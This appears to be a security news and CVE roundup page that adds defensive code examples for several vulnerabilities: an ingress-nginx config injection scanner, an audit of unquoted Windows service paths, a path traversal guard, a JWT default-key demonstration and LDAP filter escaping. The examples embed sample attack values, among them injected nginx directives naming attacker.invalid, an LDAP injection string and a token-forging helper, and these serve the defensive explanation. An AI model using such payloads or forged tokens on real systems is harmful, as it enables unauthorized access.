Google Meet is the new spam hotspot. This setting stops the random calls
Spam and scams generally go hand-in-hand. Accordingly, we all get flooded daily from various angles across multiple email and messaging services, but they’re not the only ways of getting hit. As annoying as they are, scammers are a smart bunch. Which is why my guard is now up after being contacte...
Read Full Article →
Standardizing the BAS/CS of Critical Infrastructure Cybersecurity Alerts
#Threat Intel & Vulnerability
CVE-2025-26399
Currently trending CVE - Hype Score: 24 - SolarWinds Web Help Desk was found to be susceptible to an unauthenticated AjaxProxy deserialization remote code execution vulnerability that, if exploited, would allow an attacker to run commands on the host machine. This vulnerability is a patch bypass ...
Read Full Article → *(Covered by: Intruder Intel CVE Feed)*
CVE-2025-30208
CVE-2025-54068
Currently trending CVE - Hype Score: 13 - Livewire is a full-stack framework for Laravel. In Livewire v3 up to and including v3.6.3, a vulnerability allows unauthenticated attackers to achieve remote command execution in specific scenarios. The issue stems from how certain component property upda...
Read Full Article →
CVE-2025-34165
Currently trending CVE - Hype Score: 9 - A stack-based buffer overflow vulnerability in NetSupport Manager 14.x versions prior to 14.12.0000 allows a remote, unauthenticated attacker to cause a denial of service (DoS) or potentially leak a limited amount of memory.
Read Full Article → *(Covered by: Intruder Intel CVE Feed)*
CVE-2025-59473
Currently trending CVE - Hype Score: 7 - SQL Injection vulnerability in the Structure for Admin authenticated user
Read Full Article →
CVE-2025-15566
Currently trending CVE - Hype Score: 1 - A security issue was discovered in ingress-nginx where the `nginx.ingress.kubernetes.io/auth-proxy-set-headers` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx...
Read Full Article →
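As an added practitioner check (example code written for this roundup, not the ingress-nginx project's own code and not the advisory's proof of concept): the entry above says a value that reaches nginx.conf through the `nginx.ingress.kubernetes.io/auth-proxy-set-headers` annotation can smuggle extra nginx directives. Whether the injected text travels in the annotation value itself or in the ConfigMap that value names is not stated above, so the scan below flags either when it contains a character that ends an nginx directive or block (newline, `;`, `{`, `}`, `#`). The Ingress and ConfigMap objects are constructed inline; on a live cluster you would feed it the `items` of `kubectl get ingress -A -o json` and the referenced ConfigMaps.

```python
import re

ANNOTATION = "nginx.ingress.kubernetes.io/auth-proxy-set-headers"
# Characters that close or open an nginx directive/block or start a comment.
# '$' is deliberately absent: variables such as $remote_addr are legitimate
# inside a proxy_set_header value.
_DIRECTIVE_BREAK = re.compile(r"[\r\n;{}#]")


def is_config_injection(value) -> bool:
    """True if a string copied verbatim into nginx.conf could start a new directive."""
    return bool(_DIRECTIVE_BREAK.search(str(value)))


def scan_ingresses(ingresses, configmaps) -> list:
    """ingresses: Ingress objects as dicts (the `items` of kubectl -o json).
    configmaps: {"namespace/name": {header: value}} for ConfigMaps the
    annotation may point at.  Returns (namespace, ingress, where, value)."""
    findings = []
    for ing in ingresses:
        meta = ing.get("metadata", {})
        ns, name = meta.get("namespace", "default"), meta.get("name", "?")
        annotations = meta.get("annotations") or {}
        if ANNOTATION not in annotations:
            continue
        ref = annotations[ANNOTATION]
        if is_config_injection(ref):
            findings.append((ns, name, "annotation", ref))
            continue
        # The value names a ConfigMap ("namespace/name", or a bare name in the
        # Ingress's own namespace); each entry becomes a proxy_set_header line.
        cm_key = ref if "/" in ref else f"{ns}/{ref}"
        for header, header_value in (configmaps.get(cm_key) or {}).items():
            if is_config_injection(header) or is_config_injection(header_value):
                findings.append((ns, name, f"configmap:{cm_key}:{header}", header_value))
    return findings


# Constructed objects: one Ingress whose referenced ConfigMap carries an
# injected directive, one whose annotation value itself does, one clean.
SAMPLE_INGRESSES = [
    {"metadata": {"namespace": "shop", "name": "web",
                  "annotations": {ANNOTATION: "shop/auth-headers"}}},
    {"metadata": {"namespace": "blog", "name": "cms",
                  "annotations": {ANNOTATION: "blog/hdrs;\ninclude /tmp/evil.conf;"}}},
    {"metadata": {"namespace": "blog", "name": "plain", "annotations": {}}},
]
SAMPLE_CONFIGMAPS = {
    "shop/auth-headers": {
        "X-Forwarded-User": "$http_x_user",                    # benign
        "X-Evil": "a;\nproxy_pass http://attacker.invalid;",   # injected directive
    },
}
```

This finds values already present; it does not stop a user with Ingress-create rights from adding one. Patching the controller is the fix; until then a ValidatingAdmissionPolicy carrying the same character test, or disabling the annotation, closes the write path.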
CVE-2026-2236 | HGiga C&Cm@il package olln-base up to 7.0-977 sql injection
A vulnerability categorized as critical has been discovered in HGiga C&Cm@il package olln-base up to 7.0-977. This affects an unknown function. Executing a manipulation can lead to sql injection. This vulnerability appears as CVE-2026-2236. The attack may be performed from remote. There is no a...
Read Full Article → *(Covered by: VulnDB)*
CVE-2026-24466 | Device Windows Service unquoted search path
A vulnerability was found in Oki Electric Industry/Ricoh Company/Murata Machinery Device. It has been classified as problematic. Impacted is an unknown function of the component Windows Service. This manipulation causes unquoted search path. This vulnerability is registered as CVE-2026-24466. ...
Read Full Article →
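An unquoted service path is exploitable because the Windows loader tries every space-delimited prefix of the path as a candidate executable before it reaches the real one. The function below, an added example and not the vendors' code, lists those candidate file names for a given ImagePath and audits a constructed list of service entries; on a real host the entries would come from `Get-CimInstance Win32_Service` (Name, PathName) or from the `ImagePath` values under HKLM\SYSTEM\CurrentControlSet\Services.

```python
def unquoted_hijack_candidates(image_path: str) -> list:
    """File names Windows would try before the intended binary when an
    unquoted service path contains spaces.  Empty list = quoted, or no
    space before the executable name, i.e. not exploitable this way."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    # Only the part up to the executable name matters; arguments after
    # ".exe" are passed to the program, not searched as paths.
    cut = path.lower().find(".exe")
    exe_part = path[: cut + 4] if cut != -1 else path
    return [exe_part[:i] + ".exe" for i, ch in enumerate(exe_part) if ch == " "]


def audit_services(entries) -> dict:
    """entries: iterable of (service_name, image_path).  Returns only the
    services that expose at least one hijack candidate."""
    return {name: cands
            for name, path in entries
            if (cands := unquoted_hijack_candidates(path))}


# Constructed sample entries (not real services on any host).
SAMPLE_SERVICES = [
    ("DeviceSvc", r"C:\Program Files\Vendor\Device Service\svc.exe"),
    ("DeviceSvcQuoted", r'"C:\Program Files\Vendor\Device Service\svc.exe" -run'),
    ("Svchost", r"%SystemRoot%\system32\svchost.exe -k netsvcs"),
    ("UpdaterSvc", r"C:\Vendor Tools\updater.exe --service"),
]
```

A hit is only a privilege-escalation path if a low-privileged user can write to one of the candidate directories (C:\ and Program Files are not writable by default, vendor-created folders often are). The fix is to wrap the path in quotes in the registry value, for example `sc config DeviceSvc binPath= "\"C:\Program Files\Vendor\Device Service\svc.exe\""`.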
CVE-2026-0870 | GIGABYTE MacroHub up to 2.3.1 unnecessary privileges
A vulnerability was found in GIGABYTE MacroHub up to 2.3.1 and classified as critical. This issue affects some unknown processing. The manipulation results in execution with unnecessary privileges. This vulnerability is cataloged as CVE-2026-0870. The attack must be initiated from a local posit...
Read Full Article →
CVE-2026-1868 | GitLab AI Gateway up to 18.6.1/18.7.0/18.8.0 Duo Workflow Service special elements used in a template engine
A vulnerability has been found in GitLab AI Gateway up to 18.6.1/18.7.0/18.8.0 and classified as critical. This vulnerability affects unknown code of the component Duo Workflow Service. The manipulation leads to improper neutralization of special elements used in a template engine. This vulnera...
Read Full Article →
CVE-2026-23903 | Apache Shiro up to 2.0.6 authorization
A vulnerability, which was classified as critical, was found in Apache Shiro up to 2.0.6. This affects an unknown part. Executing a manipulation can lead to authorization bypass. This vulnerability is tracked as CVE-2026-23903. The attack can be launched remotely. No exploit exists. You should...
Read Full Article →
CVE-2026-23901 | Apache Shiro up to 2.0.6 timing discrepancy
A vulnerability, which was classified as problematic, has been found in Apache Shiro up to 2.0.6. Affected by this issue is some unknown functionality. Performing a manipulation results in observable timing discrepancy. This vulnerability is identified as CVE-2026-23901. The attack can be init...
Read Full Article →
CVE-2026-1615 | jsonpath code injection (SNYK-JS-JSONPATH-13645034)
A vulnerability classified as critical was found in jsonpath. Affected by this vulnerability is an unknown functionality. Such manipulation leads to code injection. This vulnerability is referenced as CVE-2026-1615. It is possible to launch the attack remotely. No exploit is available.
Read Full Article →
CVE-2026-22613 | Eaton Network M3 up to 2.3.2 Firmware Upgrade certificate validation
A vulnerability classified as critical has been found in Eaton Network M3 up to 2.3.2. Affected is an unknown function of the component Firmware Upgrade Handler. This manipulation causes improper certificate validation. The identification of this vulnerability is CVE-2026-22613. It is possible...
Read Full Article →
CVE-2025-66595 | Yokogawa Electric FAST TOOLS up to R10.04 cross-site request forgery
CVE-2025-66599 | Yokogawa Electric FAST TOOLS up to R10.04 exposure of sensitive system information to an unauthorized control sphere
A vulnerability marked as problematic has been reported in Yokogawa Electric FAST TOOLS up to R10.04. This affects an unknown function. The manipulation leads to exposure of sensitive system information to an unauthorized control sphere. This vulnerability is uniquely identified as CVE-2025-6659...
Read Full Article →
CVE-2025-66607 | Yokogawa Electric FAST TOOLS up to R10.04 security check
A vulnerability categorized as problematic has been discovered in Yokogawa Electric FAST TOOLS up to R10.04. Impacted is an unknown function. The manipulation leads to an improperly implemented security check for a standard. This vulnerability is traded as CVE-2025-66607. The attack may be launched remotely. There is no ...
Read Full Article → *(Covered by: VulnDB)*
CVE-2025-66605 | Yokogawa Electric FAST TOOLS up to R10.04 private personal information
A vulnerability was found in Yokogawa Electric FAST TOOLS up to R10.04 and classified as problematic. Affected by this issue is some unknown functionality. Executing a manipulation can lead to exposure of private personal information to an unauthorized actor. This vulnerability is registered as ...
Read Full Article → *(Covered by: VulnDB)*
CrowdStrike Falcon Scores Perfect 100% in SE Labs’ Most Challenging Ransomware Test
CVE-2026-2227 | D-Link DCS-931L up to 1.13.0 /setSystemAdmin doSystem AdminID command injection
A vulnerability marked as critical has been reported in D-Link DCS-931L up to 1.13.0. Impacted is the function doSystem of the file /setSystemAdmin. Performing a manipulation of the argument AdminID results in command injection. This vulnerability only affects products that are no longer suppor...
Read Full Article → *(Covered by: VulnDB)*
CVE-2026-2226 | DouPHP up to 1.9 ZIP File /admin/file.php sql_filename unrestricted upload
A vulnerability labeled as critical has been found in DouPHP up to 1.9. This issue affects some unknown processing of the file /admin/file.php of the component ZIP File Handler. Such manipulation of the argument sql_filename leads to unrestricted upload. This vulnerability is uniquely identifie...
Read Full Article →
CVE-2026-2225 | itsourcecode News Portal Project 1.0 Administrator Login /admin/index.php email sql injection
A vulnerability identified as critical has been detected in itsourcecode News Portal Project 1.0. This vulnerability affects unknown code of the file /admin/index.php of the component Administrator Login. This manipulation of the argument email causes sql injection. This vulnerability is handle...
Read Full Article →
CVE-2026-2224 | code-projects Online Reviewer System 1.0 btn_functions.php firstname cross site scripting
A vulnerability categorized as problematic has been discovered in code-projects Online Reviewer System 1.0. This affects an unknown part of the file /system/system/admins/manage/users/btn_functions.php. The manipulation of the argument firstname results in cross site scripting. This vulnerabili...
Read Full Article → *(Covered by: VulnDB)*
CVE-2026-2223 | code-projects Online Reviewer System 1.0 index.php ID sql injection
FCC Cybersecurity Alert and Recommendations to Communications Providers
On January 29, 2026, the FCC issued public notice DA 26-96: PUBLIC SAFETY AND HOMELAND SECURITY BUREAU HIGHLIGHTS BEST PRACTICES FOR DEFENDING AGAINST RANSOMWARE ATTACKS. By this Public Notice, the Public Safety and Homeland Security Bureau (Bureau) of the Federal Communications Commission (Commis...
Read Full Article →
CVE-2026-2217 | itsourcecode Event Management System 1.0 /admin/manage_user.php ID sql injection
A vulnerability, which was classified as critical, was found in itsourcecode Event Management System 1.0. The impacted element is an unknown function of the file /admin/manage_user.php. The manipulation of the argument ID results in sql injection. This vulnerability is cataloged as CVE-2026-22...
Read Full Article → *(Covered by: VulnDB)*
Some good news: downstream victims of mass data theft campaigns are less likely to pay — incident responders
Mathew J. Schwartz reports: The Clop digital extortion gang for years perfected a method for wringing tens of millions out of cybercrime. Find a zero-day flaw, often in file transfer software, swarm vulnerable networks and post online the sensitive data of any victim unwilling to pay for a promis...
Read Full Article →
CVE-2025-15572 | wasm3 up to 0.5.0 NewCodePage memory leak (Issue 550)
A vulnerability, which was classified as problematic, has been found in wasm3 up to 0.5.0. The affected element is the function NewCodePage. The manipulation leads to memory leak. This vulnerability is listed as CVE-2025-15572. The attack must be carried out locally. In addition, an exploit i...
Read Full Article →
CVE-2026-2216 | rachelos WeRSS we-mp-rss up to 1.4.8 apis/tools.py download_export_file filename path traversal
A vulnerability classified as critical was found in rachelos WeRSS we-mp-rss up to 1.4.8. Impacted is the function download_export_file of the file apis/tools.py. Executing a manipulation of the argument filename can lead to path traversal. This vulnerability is tracked as CVE-2026-2216. The a...
Read Full Article →
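The standard fix for a traversal through a download parameter is to resolve the requested name against the export directory and refuse anything whose canonical path lands outside it. The code below is an added illustration written for this roundup, not WeRSS's `download_export_file`; the export directory `/srv/werss/exports` is an assumed location. It collapses `..`, absolute names and symlinks before the containment test, which a prefix check on the raw string would miss.

```python
from pathlib import Path

# Assumed export location for the example; not the project's actual path.
EXPORT_DIR = Path("/srv/werss/exports")


def resolve_export(filename: str, base: Path = EXPORT_DIR) -> Path:
    """Map a user-supplied file name onto a path inside `base`, or raise.

    `..` segments, absolute names and symlinks are all collapsed by
    resolve() before the containment test, so the decision is made on the
    path the OS would actually open, not on the string the client sent.
    """
    base = base.resolve()
    try:
        candidate = (base / filename).resolve()
    except (ValueError, OSError) as exc:        # e.g. embedded NUL byte
        raise PermissionError(f"unusable file name {filename!r}") from exc
    try:
        candidate.relative_to(base)             # raises if it escaped base
    except ValueError:
        raise PermissionError(f"refusing path outside export dir: {filename!r}")
    if candidate == base:
        raise PermissionError("refusing to serve the export directory itself")
    return candidate


def is_allowed(filename: str) -> bool:
    """Boolean form of the check, handy for request filters and tests."""
    try:
        resolve_export(filename)
        return True
    except PermissionError:
        return False


def vulnerable_resolve(filename: str) -> Path:
    """The pattern the entry above describes: the name is joined as-is, so
    '../../etc/passwd' walks out of the directory and '/etc/passwd' replaces
    it outright (pathlib discards the left operand on an absolute right)."""
    return EXPORT_DIR / filename
```

Serve the returned path, never the raw name, and keep the export directory free of symlinks pointing elsewhere; the check is only as good as what `resolve()` finds on disk.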
CVE-2026-2215 | rachelos WeRSS we-mp-rss up to 1.4.8 JWT core/auth.py SECRET_KEY default key
A vulnerability classified as problematic has been found in rachelos WeRSS we-mp-rss up to 1.4.8. This issue affects some unknown processing of the file core/auth.py of the component JWT Handler. Performing a manipulation of the argument SECRET_KEY results in use of default cryptographic key. T...
Read Full Article →
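Why a default `SECRET_KEY` is a full authentication bypass, shown as an added example (written for this roundup, not WeRSS's `core/auth.py`): with HS256 the key that verifies a token is the key that signs one, so anyone who knows the shipped default can mint an admin token the server will accept. The placeholder default `change-me` and the claim names below are hypothetical. The block implements HS256 signing and verification with the standard library so it runs without PyJWT, forges a token under the default key, and shows the startup guard that refuses to run with a default or short key.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Hypothetical placeholder standing in for whatever default a project ships.
DEFAULT_SECRET = "change-me"
MIN_SECRET_LEN = 32


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims: dict, secret: str) -> str:
    """Minimal HS256 JWT: base64url(header).base64url(payload).base64url(mac)."""
    header = _b64(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64(json.dumps(claims, separators=(",", ":")).encode())
    mac = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64(mac)}"


def verify_jwt(token: str, secret: str):
    """Return the claims if the MAC checks out under `secret`, else None."""
    try:
        header, payload, sig = token.split(".")
        if json.loads(_unb64(header)).get("alg") != "HS256":
            return None                       # no 'none' / alg-switch tricks
        expected = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _unb64(sig)):
            return None
        return json.loads(_unb64(payload))
    except ValueError:                        # wrong part count, bad base64, bad JSON
        return None


def forge_admin_token(known_secret: str) -> str:
    """What an attacker does once the default key is known: sign their own claims."""
    return sign_jwt({"sub": "admin", "role": "admin"}, known_secret)


def generate_secret() -> str:
    """Deploy-time helper: 48 random bytes, URL-safe, well above MIN_SECRET_LEN."""
    return secrets.token_urlsafe(48)


def load_secret(env: dict) -> str:
    """Startup guard: fail closed instead of silently running on the default key."""
    key = env.get("SECRET_KEY", DEFAULT_SECRET)
    if key == DEFAULT_SECRET or len(key) < MIN_SECRET_LEN:
        raise RuntimeError(
            f"SECRET_KEY is unset, default, or shorter than {MIN_SECRET_LEN} "
            "characters; generate one with generate_secret() and set it in the environment")
    return key
```

Rotating the key after a fix invalidates every token signed under the default, which is the point: tokens already minted by an attacker must stop verifying, so the rotation has to happen, not just the code change.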
CVE-2025-15571 | ckolivas lrzip up to 0.651 stream.c ucompthread null pointer dereference (Issue 263)
A vulnerability described as problematic has been identified in ckolivas lrzip up to 0.651. This vulnerability affects the function ucompthread of the file stream.c. Such manipulation leads to null pointer dereference. This vulnerability is referenced as CVE-2025-15571. The attack can only be ...
Read Full Article →
CVE-2026-2214 | code-projects for Plugin 1.0 AdminAddAlbum.php txtalbum cross site scripting
A vulnerability marked as problematic has been reported in code-projects for Plugin 1.0. This affects an unknown part of the file /Administrator/PHP/AdminAddAlbum.php. This manipulation of the argument txtalbum causes cross site scripting. The identification of this vulnerability is CVE-2026-22...
Read Full Article →
CVE-2026-2213 | code-projects Online Music Site 1.0 AdminAddAlbum.php txtimage unrestricted upload
A vulnerability labeled as critical has been found in code-projects Online Music Site 1.0. Affected by this issue is some unknown functionality of the file /Administrator/PHP/AdminAddAlbum.php. The manipulation of the argument txtimage results in unrestricted upload. This vulnerability was name...
Read Full Article →
CVE-2025-15570 | ckolivas lrzip up to 0.651 stream.c lzma_decompress_buf use after free
A vulnerability was found in ckolivas lrzip up to 0.651. It has been rated as critical. This impacts the function lzma_decompress_buf of the file stream.c. Performing a manipulation results in use after free. This vulnerability is known as CVE-2025-15570. Attacking locally is a requirement. F...
Read Full Article →
CVE-2026-2210 | D-Link DIR-823X 250416 /goform/set_filtering sub_4211C8 os command injection
A vulnerability was found in D-Link DIR-823X 250416. It has been declared as critical. This affects the function sub_4211C8 of the file /goform/set_filtering. Such manipulation leads to os command injection. This vulnerability is traded as CVE-2026-2210. The attack may be launched remotely. F...
Read Full Article →
CVE-2025-15569 | Artifex MuPDF up to 1.26.1 on Windows platform/x11/win_main.c get_system_dpi uncontrolled search path (ID 708617)
A vulnerability was found in Artifex MuPDF up to 1.26.1 on Windows. It has been classified as problematic. The impacted element is the function get_system_dpi of the file platform/x11/win_main.c. This manipulation causes uncontrolled search path. This vulnerability appears as CVE-2025-15569. T...
Read Full Article →
Several Dutch agencies suffer major data breach
APA reports: Personal data of employees of the Dutch Data Protection Authority (Autoriteit Persoonsgegevens, AP) and the Council for Justice was accessed by unauthorized persons as a result of a leak caused by a vulnerability in software used by government agencies, APA reports citing ANP news ag...
Read Full Article →
CVE-2026-2209 | WeKan up to 8.18 Custom Translation translationBody.js setCreateTranslation improper authorization
A vulnerability was found in WeKan up to 8.18 and classified as critical. The affected element is the function setCreateTranslation of the file client/components/settings/translationBody.js of the component Custom Translation Handler. The manipulation results in improper authorization. This vul...
Read Full Article →
CVE-2026-2208 | WeKan up to 8.20 Rules rules.js RulesBleed authorization
A vulnerability has been found in WeKan up to 8.20 and classified as problematic. Impacted is an unknown function of the file server/publications/rules.js of the component Rules Handler. The manipulation leads to missing authorization. This vulnerability is documented as CVE-2026-2208. The att...
Read Full Article →
CVE-2026-2207 | WeKan up to 8.20 Activity Publication activities.js LinkedBoardActivitiesBleed information disclosure
A vulnerability, which was classified as problematic, was found in WeKan up to 8.20. This issue affects some unknown processing of the file server/publications/activities.js of the component Activity Publication Handler. Executing a manipulation can lead to information disclosure. This vulnera...
Read Full Article →
CVE-2026-2206 | WeKan up to 8.20 Administrative Repair fixDuplicateLists.js FixDuplicateBleed access control
A vulnerability, which was classified as critical, has been found in WeKan up to 8.20. This vulnerability affects unknown code of the file server/methods/fixDuplicateLists.js of the component Administrative Repair Handler. Performing a manipulation results in improper access controls. This vul...
Read Full Article →
CVE-2026-2205 | WeKan up to 8.20 Meteor Publication cards.js CardPubSubBleed information disclosure
A vulnerability classified as problematic was found in WeKan up to 8.20. This affects an unknown part of the file server/publications/cards.js of the component Meteor Publication Handler. Such manipulation leads to information disclosure. This vulnerability is listed as CVE-2026-2205. The atta...
Read Full Article →
CVE-2026-25562 | WeKan up to 8.18 Attachment Metadata attachments.js information exposure (EUVD-2026-5710)
A vulnerability classified as problematic has been found in WeKan up to 8.18. Affected by this issue is some unknown functionality of the file server/publications/attachments.js of the component Attachment Metadata Handler. This manipulation causes information exposure through discrepancy. This...
Read Full Article → *(Covered by: VulnDB)*
CVE-2026-25567 | WeKan up to 8.18 Card Comment Creation API models/cardComments.js authorization (EUVD-2026-5705)
A vulnerability described as problematic has been identified in WeKan up to 8.18. Affected by this vulnerability is an unknown functionality of the file models/cardComments.js of the component Card Comment Creation API. The manipulation results in authorization bypass. This vulnerability is ide...
Read Full Article → *(Covered by: VulnDB)*
CVE-2026-25565 | WeKan up to 8.18 Update API authorization (EUVD-2026-5707)
A vulnerability labeled as critical has been found in WeKan up to 8.18. This impacts an unknown function of the component Update API. Executing a manipulation can lead to incorrect authorization. The identification of this vulnerability is CVE-2026-25565. The attack may be launched remotely. T...
Read Full Article → *(Covered by: VulnDB)*
CVE-2026-25564 | WeKan up to 8.18 Checklist models/checklists.js authorization (EUVD-2026-5708)
A vulnerability identified as problematic has been detected in WeKan up to 8.18. This affects an unknown function of the file models/checklists.js of the component Checklist Handler. Performing a manipulation results in authorization bypass. This vulnerability was named CVE-2026-25564. The att...
Read Full Article →
CVE-2026-25560 | WeKan up to 8.18 ldap.js ldap injection (EUVD-2026-5712)
A vulnerability was found in WeKan up to 8.18. It has been declared as critical. Impacted is an unknown function of the file packages/wekan-ldap/server/ldap.js. The manipulation results in ldap injection. This vulnerability is known as CVE-2026-25560. It is possible to launch the attack remot...
Read Full Article →
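LDAP injection works the same way as SQL injection: a user-supplied value is spliced into a filter string, and the metacharacters `(`, `)`, `*`, `\` and NUL let it close the intended clause and open another. The added example below (written for this roundup, not WeKan's `ldap.js`, and in Python rather than the project's JavaScript) puts the vulnerable concatenation beside the RFC 4515 escaping that neutralises it, plus a whitelist for the attribute name in case that too comes from configuration.

```python
import re

# RFC 4515 section 3: these characters must be hex-escaped inside a filter value.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}
# LDAP attribute descriptions: letters, digits, hyphens, optional ;options.
_ATTR_RE = re.compile(r"^[A-Za-z][A-Za-z0-9-]*(?:;[A-Za-z0-9-]+)*$")


def escape_filter_value(value: str) -> str:
    """Escape one assertion value; per-character mapping means no double escaping."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def check_attr(attr: str) -> str:
    """Attribute names are not escapable in a filter, so they are whitelisted."""
    if not _ATTR_RE.match(attr):
        raise ValueError(f"invalid LDAP attribute name: {attr!r}")
    return attr


def unsafe_login_filter(username: str, attr: str = "uid") -> str:
    """The vulnerable shape: raw interpolation lets the value rewrite the filter."""
    return f"(&({attr}={username})(objectClass=person))"


def login_filter(username: str, attr: str = "uid") -> str:
    """Hardened form: escaped value, validated attribute name."""
    return f"(&({check_attr(attr)}={escape_filter_value(username)})(objectClass=person))"
```

With the classic payload `*)(uid=*))(|(uid=*` the unsafe filter no longer depends on the username at all, so a bind that uses the first match logs the attacker in as whoever sorts first. Note that DN components use a different escaping (RFC 4514); this function is for filters only.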
CVE-2026-25858 | macrozheng mall up to 1.0.3 password recovery (Issue 946 / EUVD-2026-5713)
A vulnerability has been found in macrozheng mall up to 1.0.3 and classified as critical. This affects an unknown part. Performing a manipulation results in weak password recovery. This vulnerability is reported as CVE-2026-25858. The attack can be carried out remotely. No exploit ex...
Read Full Article →
CVE-2026-25857 | Tenda G300-F up to 16.01.14.2 Management Interface formSetWanDiag os command injection (EUVD-2026-5714)
A vulnerability, which was classified as critical, was found in Tenda G300-F up to 16.01.14.2. Affected by this issue is the function formSetWanDiag of the component Management Interface. Such manipulation leads to os command injection. This vulnerability is documented as CVE-2026-25857. The ...
Read Full Article →
CVE-2026-2203 | Tenda AC8 16.03.33.05 Embedded Httpd Service fast_setting_wifi_set timeZone buffer overflow
A vulnerability, which was classified as critical, has been found in Tenda AC8 16.03.33.05. Affected by this vulnerability is an unknown functionality of the file /goform/fast_setting_wifi_set of the component Embedded Httpd Service. This manipulation of the argument timeZone causes buffer ove...
Read Full Article →
CVE-2026-2202 | Tenda AC8 16.03.33.05 httpd /goform/WifiGuestSet fromSetWifiGusetBasic shareSpeed buffer overflow
A vulnerability classified as critical was found in Tenda AC8 16.03.33.05. Affected is the function fromSetWifiGusetBasic of the file /goform/WifiGuestSet of the component httpd. The manipulation of the argument shareSpeed results in buffer overflow. This vulnerability is cataloged as CVE-2026-...
Read Full Article →
CVE-2026-2201 | ZeroWdd studentmanager up to 2151560fc0a50ec00426785ec1e01a3763b380d9 LeaveController.java addLeave Reason for Leave cross site scripting
A vulnerability classified as problematic has been found in ZeroWdd studentmanager up to 2151560fc0a50ec00426785ec1e01a3763b380d9. This impacts the function addLeave of the file src/main/java/com/wdd/studentmanager/controller/LeaveController.java. The manipulation of the argument Reason for Lea...
Read Full Article →
CVE-2026-2200 | heyewei JFinalCMS 5.0.0 API Endpoint /admin/admin/save cross site scripting
A vulnerability described as problematic has been identified in heyewei JFinalCMS 5.0.0. This affects an unknown function of the file /admin/admin/save of the component API Endpoint. Executing a manipulation can lead to cross site scripting. This vulnerability is tracked as CVE-2026-2200. The ...
Read Full Article →
CVE-2026-2194 | D-Link DI-7100G C1 24.04.18D1 start_proxy_client_email command injection
A vulnerability was found in D-Link DI-7100G C1 24.04.18D1. It has been declared as critical. This affects the function start_proxy_client_email. Executing a manipulation can lead to command injection. This vulnerability is handled as CVE-2026-2194. The attack can be executed remotely. Additi...
Read Full Article → *(Covered by: VulnDB)*
CVE-2026-2192 | Tenda AC9 15.03.06.42_multi formGetRebootTimer stack-based overflow
A vulnerability was found in Tenda AC9 15.03.06.42_multi and classified as critical. Affected by this vulnerability is the function formGetRebootTimer. Such manipulation of the argument sys.schedulereboot.start_time/sys.schedulereboot.end_time leads to stack-based buffer overflow. This vulnerab...
Read Full Article →
CVE-2026-2191 | Tenda AC9 15.03.06.42_multi formGetDdosDefenceList security.ddos.map stack-based overflow
A vulnerability has been found in Tenda AC9 15.03.06.42_multi and classified as critical. Affected is the function formGetDdosDefenceList. This manipulation of the argument security.ddos.map causes stack-based buffer overflow. This vulnerability appears as CVE-2026-2191. The attack may be init...
Read Full Article →
CVE-2026-2189 | itsourcecode School Management System 1.0 index.php ay sql injection (EUVD-2026-5761)
A vulnerability, which was classified as critical, has been found in itsourcecode School Management System 1.0. This affects an unknown function of the file /ramonsys/report/index.php. The manipulation of the argument ay leads to sql injection. This vulnerability is documented as CVE-2026-2189...
Read Full Article →
CVE-2026-2188 | UTT 进取 521G 3.1.1-190816 /goform/formPdbUpConfig sub_446B18 policyNames os command injection (EUVD-2026-5762)
A vulnerability classified as critical was found in UTT 进取 521G 3.1.1-190816. The impacted element is the function sub_446B18 of the file /goform/formPdbUpConfig. Executing a manipulation of the argument policyNames can lead to os command injection. This vulnerability is registered as CVE-2026-...
Read Full Article →
CVE-2026-2187 | Tenda RX3 16.03.13.11 /goform/formSetQosBand set_qosMib_list stack-based overflow (EUVD-2026-5763)
A vulnerability classified as critical has been found in Tenda RX3 16.03.13.11. The affected element is the function set_qosMib_list of the file /goform/formSetQosBand. Performing a manipulation of the argument list results in stack-based buffer overflow. This vulnerability is cataloged as CVE-...
Read Full Article → *(Covered by: VulnDB)*
CVE-2026-2185 | Tenda RX3 16.03.13.11 MAC Filtering Configuration Endpoint /goform/setBlackRule set_device_name devName/mac stack-based overflow (EUVD-2026-5765)
A vulnerability marked as critical has been reported in Tenda RX3 16.03.13.11. This issue affects the function set_device_name of the file /goform/setBlackRule of the component MAC Filtering Configuration Endpoint. This manipulation of the argument devName/mac causes stack-based buffer overflow...
Read Full Article →
CVE-2026-2184 | Great Developers Certificate Generation System up to 97171bb0e5e22e52eacf4e4fa81773e5f3cffb73 /restructured/csv.php photo os command injection (EUVD-2026-5766)
A vulnerability labeled as critical has been found in Great Developers Certificate Generation System up to 97171bb0e5e22e52eacf4e4fa81773e5f3cffb73. This vulnerability affects unknown code of the file /restructured/csv.php. The manipulation of the argument photo results in os command injection....
Read Full Article → *(Covered by: VulnDB)*
CVE-2026-2182 | UTT 进取 521G 3.1.1-190816 /goform/setSysAdm doSystem passwd1 command injection (EUVD-2026-5768)
A vulnerability categorized as critical has been discovered in UTT 进取 521G 3.1.1-190816. Affected by this issue is the function doSystem of the file /goform/setSysAdm. Executing a manipulation of the argument passwd1 can lead to command injection. The identification of this vulnerability is CVE...
Read Full Article →
CVE-2026-2181 | Tenda RX3 16.03.13.11 /goform/openSchedWifi schedStartTime/schedEndTime stack-based overflow (EUVD-2026-5769)
A vulnerability was found in Tenda RX3 16.03.13.11. It has been rated as critical. Affected by this vulnerability is an unknown functionality of the file /goform/openSchedWifi. Performing a manipulation of the argument schedStartTime/schedEndTime results in stack-based buffer overflow. This vu...
Read Full Article →
CVE-2026-2180 | Tenda RX3 16.03.13.11 fast_setting_wifi_set ssid_5g stack-based overflow (EUVD-2026-5770)
A vulnerability was found in Tenda RX3 16.03.13.11. It has been declared as critical. Affected is an unknown function of the file /goform/fast_setting_wifi_set. Such manipulation of the argument ssid_5g leads to stack-based buffer overflow. This vulnerability is uniquely identified as CVE-2026...
Read Full Article →
